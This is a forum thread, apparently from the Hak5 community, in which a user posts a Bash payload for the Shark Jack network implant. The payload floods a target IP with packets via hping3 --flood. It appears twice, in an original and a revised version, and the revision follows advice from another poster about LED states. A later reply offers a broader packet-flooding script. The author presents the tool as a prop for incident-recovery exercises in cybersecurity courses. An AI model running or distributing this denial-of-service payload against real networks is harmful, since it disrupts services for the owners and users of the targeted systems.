Sourison Posted November 10, 2019 Share Posted November 10, 2019 #!/bin/bash # # Title: denial of service on the Shark Jack # Author: Sourison # Version: 1.1.0 # # Red ...........Setup # Magenta..........Running # ##Hping options, Change TARGET_IP to the target ip address HPING_OPTIONS="--flood -c 4096 TARGET_IP" function setup() { LED R # Set NETMODE to DHCP_CLIENT for Shark Jack v1.1.0+ NETMODE DHCP_CLIENT # Wait for an IP address to be obtained while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done } function run() { # Run setup setup LED M # Start scan hping3 $HPING_OPTIONS finish } # Run payload run & Good Morning all, I've just create an HPING flood "attack" for a specified target. I tempt to use this alot in our cybersecurity courses when they need to do incident recovery and start fixing their systems. This part is nice when they just plug the cables and forget about the contaiment parts.. Feel free to edit/make it better. I'll attach the payload.sh Kind regards Joshua (Sourison) payload.sh Link to comment Share on other sites More sharing options...
Darren Kitchen Posted November 10, 2019 Share Posted November 10, 2019 Awesome payload! I would suggest changing the LED to use the standardized states like LED SETUP, LED ATTACK and such. They're documented at https://docs.hak5.org/hc/en-us/articles/360034667893-LED Currently your LED commands will fail, as they would need an additional parameter - like SOLID. Link to comment Share on other sites More sharing options...
Sourison Posted November 11, 2019 Author Share Posted November 11, 2019 On 11/10/2019 at 5:36 PM, Darren Kitchen said: Awesome payload! I would suggest changing the LED to use the standardized states like LED SETUP, LED ATTACK and such. They're documented at https://docs.hak5.org/hc/en-us/articles/360034667893-LED Currently your LED commands will fail, as they would need an additional parameter - like SOLID. Thank you Darren for your reply, I really appreciate your help 🙂 Below I've added the new code. #!/bin/bash # # Title: denial of service on the Shark Jack # Author: Sourison # Version: 1.1.0 # # Magenta...........Setup # Yellow..........Running # ##Hping options, Change TARGET_IP to the target ip address HPING_OPTIONS="--flood -c 4096 TARGET_IP" function setup() { LED SETUP # Set NETMODE to DHCP_CLIENT for Shark Jack v1.1.0+ NETMODE DHCP_CLIENT # Wait for an IP address to be obtained while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done } function run() { # Run setup setup LED ATTACK # Start scan hping3 $HPING_OPTIONS finish } # Run payload run & Kind Regards Joshua (Sourison) Link to comment Share on other sites More sharing options...
Sourison Posted November 11, 2019 Author Share Posted November 11, 2019 btw the ip addresses are my "lab ip's.. so it's not a secret 😉" Link to comment Share on other sites More sharing options...
i8igmac Posted November 21, 2019 Share Posted November 21, 2019 I posted a hping3 script. Does anyone have access to the old backtrack forums. I would like to share the script, it covered all typs of packet flooding attacks. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.